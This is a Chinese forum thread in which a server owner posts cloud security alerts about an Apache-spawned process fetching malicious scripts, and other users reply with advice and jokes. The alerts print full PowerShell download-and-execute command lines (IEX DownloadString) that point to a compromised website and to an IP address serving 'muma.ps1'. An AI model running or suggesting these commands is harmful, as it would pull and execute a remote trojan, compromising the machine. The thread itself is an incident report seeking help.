服务器消息提示进程异常行为-访问恶意下载源
本帖最后由 lovesshao 于 2020-7-16 16:51 编辑最近服务器消息提示:进程异常行为-访问恶意下载源,如图该如何解决
备注处理
该告警由如下引擎检测发现:
父进程路径:D:/MYOA/bin/apache.exe
父进程命令行:D:\MYOA\bin\apache.exe -d D:/MYOA
父进程id:1416
进程ID:5644
URL链接:https://www.naosbio.com/images/main/js/ax.txt
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('https://www.naosbio.com/images/main/js/ax.txt')
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
进程异常行为-访问恶意下载源待处理高级威胁检测模型备注处理
该告警由如下引擎检测发现:
父进程路径:D:/MYOA/bin/apache.exe
父进程命令行:D:\MYOA\bin\apache.exe -d D:/MYOA
父进程id:2176
进程ID:7688
URL链接:http://13.115.195.195:801/muma.ps1
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http://13.115.195.195:801/muma.ps1')
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。 亲测360安全卫士可以查杀,建议装个360查杀一下 .......... p a s t e b i n . c o m 一个挂马地址 你服务器是做医院的? hengtongwl 发表于 2020-7-16 17:05
你服务器是做医院的?
不是的 是云服务器自己单位用的呢 lovesshao 发表于 2020-7-16 17:16
不是的 是云服务器自己单位用的呢
看个网站是一个医药行业的网站,还是个韩国的 lovesshao 发表于 2020-7-16 17:16
不是的 是云服务器自己单位用的呢
你先用进程编号找一下那个进程然后打开相应文件夹看看到底是做啥用的 啥文件名称能叫 muma.ps1的看拼音就是木马呀 神 muma.sp1 ... 不用看了,中毒了。想办法杀毒把,我不会。 我就服气你这样的~!~!! 中毒了,想办法杀毒吧。或者请人杀毒
页:
[1]
2